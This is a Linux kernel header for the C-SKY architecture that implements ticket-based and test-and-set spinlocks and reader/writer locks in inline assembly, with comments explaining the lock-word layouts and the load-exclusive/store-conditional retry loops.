/* SPDX-License-Identifier: GPL-2.0 */

#ifndef __ASM_CSKY_SPINLOCK_H
#define __ASM_CSKY_SPINLOCK_H

#include <linux/spinlock_types.h>
#include <asm/barrier.h>

#ifdef CONFIG_QUEUED_RWLOCKS

/*
 * Ticket-based spin-locking.
 */
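/*
 * The lock word holds two half-word ticket counters, "owner" and
 * "next" (see the tickets layout in <asm/spinlock_types.h>;
 * TICKET_NEXT is the bit offset of the "next" field within the
 * 32-bit word).  A locker atomically bumps "next" to draw a ticket,
 * then spins until "owner" catches up with that ticket; unlock
 * advances "owner", handing the lock on in FIFO order.
 *
 * ldex.w/stex.w are C-SKY's load-exclusive/store-conditional pair:
 * stex.w leaves 1 in its operand on success and 0 if the reservation
 * was lost, so "bez %0, 1b" retries the read-modify-write.
 *
 * Rough C sketch of the take-a-ticket step (illustrative only;
 * store_cond() is a stand-in for the ldex/stex retry, not a real
 * kernel helper):
 *
 *	do {
 *		lockval.lock = READ_ONCE(lock->lock);		   // ldex.w
 *	} while (!store_cond(&lock->lock,
 *			     lockval.lock + (1 << TICKET_NEXT)));  // stex.w
 */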
static inline void arch_spin_lock(arch_spinlock_t *lock)
{
	arch_spinlock_t lockval;
	u32 ticket_next = 1 << TICKET_NEXT;
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%2) \n"
		"	mov		%1, %0	 \n"
		"	add		%0, %3	 \n"
		"	stex.w		%0, (%2) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp), "=&r" (lockval)
		: "r"(p), "r"(ticket_next)
		: "cc");

	while (lockval.tickets.next != lockval.tickets.owner)
		lockval.tickets.owner = READ_ONCE(lock->tickets.owner);

	smp_mb();
}

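/*
 * Trylock fast path: "rotli %1, %0, 16" swaps the two half-words of
 * the loaded lock value so that "cmpne" can compare owner against
 * next in place.  If they differ the lock is already held and we
 * bail out with "contended" set, without attempting the store.
 */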
static inline int arch_spin_trylock(arch_spinlock_t *lock)
{
	u32 tmp, contended, res;
	u32 ticket_next = 1 << TICKET_NEXT;
	u32 *p = &lock->lock;

	do {
		asm volatile (
		"	ldex.w		%0, (%3)   \n"
		"	movi		%2, 1	   \n"
		"	rotli		%1, %0, 16 \n"
		"	cmpne		%1, %0     \n"
		"	bt		1f         \n"
		"	movi		%2, 0	   \n"
		"	add		%0, %0, %4 \n"
		"	stex.w		%0, (%3)   \n"
		"1:				   \n"
		: "=&r" (res), "=&r" (tmp), "=&r" (contended)
		: "r"(p), "r"(ticket_next)
		: "cc");
	} while (!res);

	if (!contended)
		smp_mb();

	return !contended;
}

static inline void arch_spin_unlock(arch_spinlock_t *lock)
{
	smp_mb();
	WRITE_ONCE(lock->tickets.owner, lock->tickets.owner + 1);
}

static inline int arch_spin_value_unlocked(arch_spinlock_t lock)
{
	return lock.tickets.owner == lock.tickets.next;
}

static inline int arch_spin_is_locked(arch_spinlock_t *lock)
{
	return !arch_spin_value_unlocked(READ_ONCE(*lock));
}

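/* A gap of more than one ticket means at least one CPU is queued behind the owner. */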
static inline int arch_spin_is_contended(arch_spinlock_t *lock)
{
	struct __raw_tickets tickets = READ_ONCE(lock->tickets);

	return (tickets.next - tickets.owner) > 1;
}
#define arch_spin_is_contended	arch_spin_is_contended

#include <asm/qrwlock.h>

/* See include/linux/spinlock.h */
#define smp_mb__after_spinlock()	smp_mb()

#else /* CONFIG_QUEUED_RWLOCKS */

/*
 * Test-and-set spin-locking.
 */
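/*
 * Simpler fallback: the lock word is 0 when free.  A locker spins
 * until it reads 0, then store-conditionally writes 1; unlock simply
 * stores 0.  Unlike the ticket variant above there is no FIFO
 * ordering, so this lock is not fair under contention.
 */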
static inline void arch_spin_lock(arch_spinlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 1b   \n"
		"	movi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
	smp_mb();
}

static inline void arch_spin_unlock(arch_spinlock_t *lock)
{
	smp_mb();
	WRITE_ONCE(lock->lock, 0);
}

static inline int arch_spin_trylock(arch_spinlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 2f   \n"
		"	movi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		"	movi		%0, 0    \n"
		"2:				 \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");

	if (!tmp)
		smp_mb();

	return !tmp;
}

#define arch_spin_is_locked(x)	(READ_ONCE((x)->lock) != 0)

/*
 * read lock/unlock/trylock
 */
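/*
 * The rwlock word is a signed reader count: 0 means unlocked, a
 * positive value is the number of readers, and a negative value
 * (written by arch_write_lock() via "subi") means a writer holds the
 * lock.  Readers spin while the count is negative ("blz"), then
 * atomically increment it; arch_read_unlock() decrements it again.
 */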
static inline void arch_read_lock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	blz		%0, 1b   \n"
		"	addi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
	smp_mb();
}

static inline void arch_read_unlock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	smp_mb();
	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	subi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
}

static inline int arch_read_trylock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	blz		%0, 2f   \n"
		"	addi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		"	movi		%0, 0    \n"
		"2:				 \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");

	if (!tmp)
		smp_mb();

	return !tmp;
}

/*
 * write lock/unlock/trylock
 */
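/*
 * A writer waits for the count to drop to 0 (no readers and no
 * writer), then claims the lock by store-conditionally writing -1
 * ("subi" from 0); arch_write_unlock() stores 0 to release it.
 */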
static inline void arch_write_lock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 1b   \n"
		"	subi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
	smp_mb();
}

static inline void arch_write_unlock(arch_rwlock_t *lock)
{
	smp_mb();
	WRITE_ONCE(lock->lock, 0);
}

static inline int arch_write_trylock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 2f   \n"
		"	subi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		"	movi		%0, 0    \n"
		"2:				 \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");

	if (!tmp)
		smp_mb();

	return !tmp;
}

#endif /* CONFIG_QUEUED_RWLOCKS */
#endif /* __ASM_CSKY_SPINLOCK_H */
